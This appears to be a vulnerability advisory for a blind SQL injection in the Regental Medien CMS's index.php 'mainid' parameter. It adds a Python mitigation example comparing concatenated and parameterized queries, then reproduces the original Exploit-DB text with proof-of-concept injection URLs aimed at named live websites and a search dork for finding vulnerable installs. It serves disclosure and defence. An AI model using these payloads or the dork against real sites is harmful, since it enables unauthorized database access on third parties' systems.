Vendor: Regental Medien
By: NoGe
CVSS: 7.5 (HIGH)
Blind SQL Injection
CWE: 89
Product Name: Regental Medien
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Regental Medien Blind SQL Injection Vulnerability

Regental Medien is vulnerable to blind SQL injection. The vulnerable file is index.php, and the injection point is the mainid parameter, which accepts a malicious SQL query. The proof of concept in the raw data below shows the same request marked TRUE or FALSE depending on the injected condition. The dork for this vulnerability is 'powered by regental medien'.

Mitigation:

Input validation should be done to prevent SQL injection attacks. Sanitize user input and use parameterized queries.
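
The mitigation above as an added example (not code from Regental Medien or from the original advisory). It shows why concatenating `mainid` into the query produces the true/false difference the proof of concept relies on, and how an integer check plus a bound parameter removes it. The in-memory SQLite table, its `pages` schema and all function names are assumptions made for illustration.

```python
import re
import sqlite3

def build_db():
    """Constructed sample data; the real schema is not shown on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(9, "Home"), (30, "Contact")])
    return db

def lookup_concatenated(db, mainid):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT title FROM pages WHERE id = " + mainid
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, mainid):
    """Parameterized query: the value is bound as data, never parsed as SQL."""
    sql = "SELECT title FROM pages WHERE id = ?"
    return [row[0] for row in db.execute(sql, (mainid,))]

def lookup_hardened(db, mainid):
    """Input validation plus binding: accept only a plain decimal integer."""
    # fullmatch with [0-9] rejects trailing newlines and non-ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", mainid):
        raise ValueError("mainid must be a decimal integer")
    return lookup_bound(db, int(mainid))

if __name__ == "__main__":
    db = build_db()
    # Constructed request values: a normal id, then a true and a false condition.
    for value in ("9", "9 and 1=1", "9 and 1=2"):
        print(repr(value),
              "concatenated:", lookup_concatenated(db, value),
              "bound:", lookup_bound(db, value))
```

With concatenation the two conditional values return different results, which is the signal a blind injection needs. With binding both return the same empty result, and the validated path rejects them before any query runs.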
Source

Exploit-DB raw data:

[o] Regental Medien Blind SQL Injection Vulnerability
Software : Regental Medien
Vendor   : http://www.regental-medien.de/
Author   : NoGe
Home     : http://antisecurity.org

[o] Vulnerable file
index.php

[o] Exploit
http://localhost/[path]/index.php?mainid=[SQL]

[o] Proof of Concept
http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=4 << TRUE
http://demo15.rm-websystem.de/index.php?mainid=9+and+substring(@@version,1,1)=5 << FALSE
http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=4 << TRUE
http://www.innenstadterleben.de/index.php?mainid=30+and+substring(@@version,1,1)=5 << FALSE

[o] Dork
"powered by regental medien"

[o] Note
this is a private script
all target are in one IP address